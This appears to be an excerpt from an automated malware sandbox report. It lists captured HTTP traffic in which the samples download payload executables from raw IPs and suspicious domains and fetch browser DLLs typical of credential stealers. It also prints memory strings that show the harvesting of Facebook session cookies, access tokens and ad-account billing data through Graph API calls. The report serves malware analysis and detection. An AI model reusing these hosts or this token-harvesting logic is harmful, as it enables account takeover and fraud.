e6 30 09 51 1b 8d b6 c8 c1 92 9d fc 2c 0e 1d 56 d8 7f 90 2e fe 7d 3e f9 21 f4 ef 3e 74 41 5e 58 85 45 68 84 31 cc 59 f5 be 3c fb b2 97 7a fe 03 d4 13 ae 17 69 03 00 00 Data Ascii: UR }^KJ&yj$aQ0'n{/yX{8|#R[UDr|Sg8_JznO!E,S,u<c?u`tRlW6a<:!D$(|sH5FF!/4?wd9KkEl=5_^,J(bSG5%KFYkUyk:8,{Y/)!:ldcg+!e$dF+|[s{{5h**!lx@J:8#pttbo8>-q%d9AC1=uAKmP0Q,V.}>!>tA^XEh1Y<zi
      Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133
      Source: global trafficHTTP traffic detected: GET /WW/file2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: freeprivacytoolsforyou.xyzCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file9.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /campaign1/SunLabsPlayer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: nicepricingsaleregistration.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file8.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file4.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /start/?v=2000 HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /start/css/screen.css?1=1 HTTP/1.1Accept: */*Referer: http://www.browzar.com/start/?v=2000Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /start/css/ie8.css HTTP/1.1Accept: */*Referer: http://www.browzar.com/start/?v=2000Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /start/images/browzar-logo.png HTTP/1.1Accept: */*Referer: http://www.browzar.com/start/?v=2000Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /start/css/ie7.css HTTP/1.1Accept: */*Referer: http://www.browzar.com/start/?v=2000Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-AliveCookie: __utma=175377393.1983812090.1624479776.1624479776.1624479776.1; __utmb=175377393.1.10.1624479776; __utmc=175377393; __utmz=175377393.1624479776.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
      Source: global trafficHTTP traffic detected: GET /seemorebty/il.php?e=md8_8eus HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9Referer: https://www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 101.36.107.74
      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: uyg5wye.2ihsfa.com
      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /stats/remember.php?pub=mixinte&user=user HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: UXlT-p8lf-ZCa5-xqrCHost: g-partners.top
      Source: jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmpString found in binary or memory: Anmelden oder Registrieren</title><meta name="google" content="notranslate" /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/" /><meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" /><meta property="og:locale" content="de_DE" /><meta name="description" content="Melde dich bei Facebook an, um dich mit deinen Freunden, deiner Familie und Personen, die du kennst, zu verbinden und Inhalte zu teilen." /><link rel="canonical" href="https://www.facebook.com/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0,cross/XzMVk90uhh2.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="/uaktyf" /> equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpString found in binary or memory: &ctarget=https%3A%2F%2Fwww.facebook.comcquick=jsc_c_e&cquick_token=/settings?find email</strong><strong>fbSettingsListItemContentEmail not found.0" title="href="https://www.facebook.com/profile_icondata-gt" role="<a aria-label=<a class=*/profile.php?sk=friend_gs6">,"Friends":"no</span><span>no*/*,adtrust_dsl":disable_reason":account_currency_ratio_to_usd":~~-no\,"ed":","bl":","qy":","status":"https://www.facebook.com/bookmarks/pages?ref_type=logout_gearcounttype:https://www.facebook.com/pages/?category=your_pages&ref=bookmarksadmined_pages":{"nodes":[{,"Page":"1<a href="https://business.facebook.com,"bm":"<>class="lastRow right","currency":","a":","b":"CHROME,"Channel":","Browser":"00}]0102030405060708"username":"edge_followed_by":{"count":edge_follow":{"count":email":"username":"phone_number":"gender":first_name":"last_name":"{#},"br":"","yo":""pa":""us":""re":""ph":""se":""fs":,"fsr":"Channel":""xtype":2}]","ok":"1"0","pass":","browse":"\"Failed to initialise Winsock, Error:%u equals www.facebook.com (Facebook)
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.745782059.000000000176F000.00000004.00000001.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Weitere Sprachen anzeigen"><i class="img sp_lQhkC81p6_t sx_df2747"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook-Webseitenlinks"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/r.php" title="F&#xfc;r Facebook registrieren">Registrieren</a></li><li><a href="/login/" title="Bei Facebook anmelden">Anmelden</a></li><li><a href="https://messenger.com/" title="Probiere den Messenger aus.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite f&#xfc;r Android">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Durchst&#xf6;bere unsere Watch-Videos."> Watch </a></li><li><a href="/directory/people/" title="Durchsuche unser Personenverzeichnis.">Personen</a></li><li><a href="/directory/pages/" title="Durchsuche unser Seitenverzeichnis.">Seiten</a></li><li><a href="/pages/category/">Seitenkategorien</a></li><li><a href="/places/" title="Probiere beliebte Orte auf Facebook aus.">Orte</a></li><li><a href="/games/" title="Probiere Spiele auf Facebook aus.">Spiele</a></li><li><a href="/directory/places/" title="Durchsuche unser Orteverzeichnis.">Standorte</a></li><li><a href="/marketplace/" title="Im Facebook Marketplace Artikel kaufen und verkaufen">Marketplace</a></li><li><a href="https://pay.facebook.com/" target="_blank" title="Weitere Informationen zu Facebook Pay">Facebook Pay</a></li><li><a href="/directory/groups/" title="Durchsuche unser Gruppenverzeichnis.">Gruppen</a></li><li><a href="/jobs/" title="Bewirb dich auf Jobanzeigen oder suche selbst nach neuen Mitarbeitern auf Facebook.">Jobs</a></li><li><a href="https://www.oculus.com/" target="_blank" title="Weitere Informationen zu Oculus">Oculus</a></li><li><a href="https://portal.facebook.com/" target="_blank" title="Mehr zu Portal from Facebook">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1Vo248XzID7zuWZ893pIiV2_OO0IVg5Pgrz8JUY3I2L67SOeLDELakpUQ1gDiR6ctD-GfD70jUxF1UhmV0Wc-f8vnqHWLX5uYSKMNDgNJ3jg58S1WPDVDX4MFHI6RM67Y6SJ4WU0zSSBV-Yag-6Q" title="Probiere Instagram aus" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="/local/lists/245019872666104/" title="Durchsuche unser Verzeichnis &#x201e;Lokale Listen&#x201c;.">Lokales</a></li><li><a href="/fundraisers/" title="Spende f&#xfc;r eine sinnvolle Sache.">Spendenaktionen</a></li><li><a href="/biz/directory/" title="Durchsuche unser Facebook Dienstleistungsverzeichnis">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Wahl-Informationszentrum ansehen">Wahl-Informationszentrum</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Lies unseren Blog, entdecke unseren Ressourcenb
      Source: jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Weitere Sprachen anzeigen"><i class="img sp_lQhkC81p6_t sx_df2747"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook-Webseitenlinks"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/r.php" title="F&#xfc;r Facebook registrieren">Registrieren</a></li><li><a href="/login/" title="Bei Facebook anmelden">Anmelden</a></li><li><a href="https://messenger.com/" title="Probiere den Messenger aus.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite f&#xfc;r Android">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Durchst&#xf6;bere unsere Watch-Videos."> Watch </a></li><li><a href="/directory/people/" title="Durchsuche unser Personenverzeichnis.">Personen</a></li><li><a href="/directory/pages/" title="Durchsuche unser Seitenverzeichnis.">Seiten</a></li><li><a href="/pages/category/">Seitenkategorien</a></li><li><a href="/places/" title="Probiere beliebte Orte auf Facebook aus.">Orte</a></li><li><a href="/games/" title="Probiere Spiele auf Facebook aus.">Spiele</a></li><li><a href="/directory/places/" title="Durchsuche unser Orteverzeichnis.">Standorte</a></li><li><a href="/marketplace/" title="Im Facebook Marketplace Artikel kaufen und verkaufen">Marketplace</a></li><li><a href="https://pay.facebook.com/" target="_blank" title="Weitere Informationen zu Facebook Pay">Facebook Pay</a></li><li><a href="/directory/groups/" title="Durchsuche unser Gruppenverzeichnis.">Gruppen</a></li><li><a href="/jobs/" title="Bewirb dich auf Jobanzeigen oder suche selbst nach neuen Mitarbeitern auf Facebook.">Jobs</a></li><li><a href="https://www.oculus.com/" target="_blank" title="Weitere Informationen zu Oculus">Oculus</a></li><li><a href="https://portal.facebook.com/" target="_blank" title="Mehr zu Portal from Facebook">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1cSfQRJz86bBsUwk3Wa8nmXYLFFUETc5mPq9FMt8_kw1grZDOuJA3D6BcnTYD5PRlmoAMGpZx_lu8O-Wh8QBjZsl1hkTtgGX9KvWG078mQgMEXY0Uf91_nUj5RLAXe-jTmu2JRH8L6mXAhm59bgGDITmRSll3a0DE" title="Probiere Instagram aus" target="_blank" rel="nofollow" data-lynx-mode="async">Instagram</a></li><li><a href="/local/lists/245019872666104/" title="Durchsuche unser Verzeichnis &#x201e;Lokale Listen&#x201c;.">Lokales</a></li><li><a href="/fundraisers/" title="Spende f&#xfc;r eine sinnvolle Sache.">Spendenaktionen</a></li><li><a href="/biz/directory/" title="Durchsuche unser Facebook Dienstleistungsverzeichnis">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Wahl-Informationszentrum ansehen">Wahl-Informationszentrum</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Lies unseren Blog, entdecke unseren Re
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Weitere Sprachen anzeigen"><i class="img sp_lQhkC81p6_t sx_df2747"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook-Webseitenlinks"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/r.php" title="F&#xfc;r Facebook registrieren">Registrieren</a></li><li><a href="/login/" title="Bei Facebook anmelden">Anmelden</a></li><li><a href="https://messenger.com/" title="Probiere den Messenger aus.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite f&#xfc;r Android">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Durchst&#xf6;bere unsere Watch-Videos."> Watch </a></li><li><a href="/directory/people/" title="Durchsuche unser Personenverzeichnis.">Personen</a></li><li><a href="/directory/pages/" title="Durchsuche unser Seitenverzeichnis.">Seiten</a></li><li><a href="/pages/category/">Seitenkategorien</a></li><li><a href="/places/" title="Probiere beliebte Orte auf Facebook aus.">Orte</a></li><li><a href="/games/" title="Probiere Spiele auf Facebook aus.">Spiele</a></li><li><a href="/directory/places/" title="Durchsuche unser Orteverzeichnis.">Standorte</a></li><li><a href="/marketplace/" title="Im Facebook Marketplace Artikel kaufen und verkaufen">Marketplace</a></li><li><a href="https://pay.facebook.com/" target="_blank" title="Weitere Informationen zu Facebook Pay">Facebook Pay</a></li><li><a href="/directory/groups/" title="Durchsuche unser Gruppenverzeichnis.">Gruppen</a></li><li><a href="/jobs/" title="Bewirb dich auf Jobanzeigen oder suche selbst nach neuen Mitarbeitern auf Facebook.">Jobs</a></li><li><a href="https://www.oculus.com/" target="_blank" title="Weitere Informationen zu Oculus">Oculus</a></li><li><a href="https://portal.facebook.com/" target="_blank" title="Mehr zu Portal from Facebook">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1lmsuWA3Zx0esrnAvIFkqdvA1vcn6XVxCCtJn2XKaO3tieabZVVXbiybgiXJU6w6-AQQQrFD2Y36KvwqwSyWonoxMnI4RV5XjEyJ-FYUBCHxAvMVYRHOYqHN6IMaokbKLnK8uc5xGM7sojhQpAeA" title="Probiere Instagram aus" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="/local/lists/245019872666104/" title="Durchsuche unser Verzeichnis &#x201e;Lokale Listen&#x201c;.">Lokales</a></li><li><a href="/fundraisers/" title="Spende f&#xfc;r eine sinnvolle Sache.">Spendenaktionen</a></li><li><a href="/biz/directory/" title="Durchsuche unser Facebook Dienstleistungsverzeichnis">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Wahl-Informationszentrum ansehen">Wahl-Informationszentrum</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Lies unseren Blog, entdecke unseren Ressourcenb
      Source: jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Weitere Sprachen anzeigen"><i class="img sp_lQhkC81p6_t sx_df2747"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook-Webseitenlinks"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/r.php" title="F&#xfc;r Facebook registrieren">Registrieren</a></li><li><a href="/login/" title="Bei Facebook anmelden">Anmelden</a></li><li><a href="https://messenger.com/" title="Probiere den Messenger aus.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite f&#xfc;r Android">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Durchst&#xf6;bere unsere Watch-Videos."> Watch </a></li><li><a href="/directory/people/" title="Durchsuche unser Personenverzeichnis.">Personen</a></li><li><a href="/directory/pages/" title="Durchsuche unser Seitenverzeichnis.">Seiten</a></li><li><a href="/pages/category/">Seitenkategorien</a></li><li><a href="/places/" title="Probiere beliebte Orte auf Facebook aus.">Orte</a></li><li><a href="/games/" title="Probiere Spiele auf Facebook aus.">Spiele</a></li><li><a href="/directory/places/" title="Durchsuche unser Orteverzeichnis.">Standorte</a></li><li><a href="/marketplace/" title="Im Facebook Marketplace Artikel kaufen und verkaufen">Marketplace</a></li><li><a href="https://pay.facebook.com/" target="_blank" title="Weitere Informationen zu Facebook Pay">Facebook Pay</a></li><li><a href="/directory/groups/" title="Durchsuche unser Gruppenverzeichnis.">Gruppen</a></li><li><a href="/jobs/" title="Bewirb dich auf Jobanzeigen oder suche selbst nach neuen Mitarbeitern auf Facebook.">Jobs</a></li><li><a href="https://www.oculus.com/" target="_blank" title="Weitere Informationen zu Oculus">Oculus</a></li><li><a href="https://portal.facebook.com/" target="_blank" title="Mehr zu Portal from Facebook">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2MGZdNe_dGxTtRIdRApVqwrSR5M3TRlTfbNKyV4-_5uBUqj6kn1sZ_KNyaeTt6RvToUU66TAAQzmKz-LoEjWmgODh_jWOv93YURiLQ5b4CwFG481kiuDPJS_a_goU9Dsthuurj253RoWsfj-6tkg" title="Probiere Instagram aus" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="/local/lists/245019872666104/" title="Durchsuche unser Verzeichnis &#x201e;Lokale Listen&#x201c;.">Lokales</a></li><li><a href="/fundraisers/" title="Spende f&#xfc;r eine sinnvolle Sache.">Spendenaktionen</a></li><li><a href="/biz/directory/" title="Durchsuche unser Facebook Dienstleistungsverzeichnis">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Wahl-Informationszentrum ansehen">Wahl-Informationszentrum</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Lies unseren Blog, entdecke unseren Ressourcenb
      Source: yevbZfdCqR.exe, 00000001.00000003.657101676.0000000005E51000.00000004.00000001.sdmpString found in binary or memory: 87.0.4280.88 Safari/537.36 Edg/87.0.664.60http://ip-api.com/json/countryCodecountry_codeofen_placemac10isinstallisLogined33uidversionc_userjazoest=/login/device-based/login/"=""jazoest""lsd""uid""source"&lsd=&uid=&source=&next=https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:{_/v9.0/actpayInfoaccountIdhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v9.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%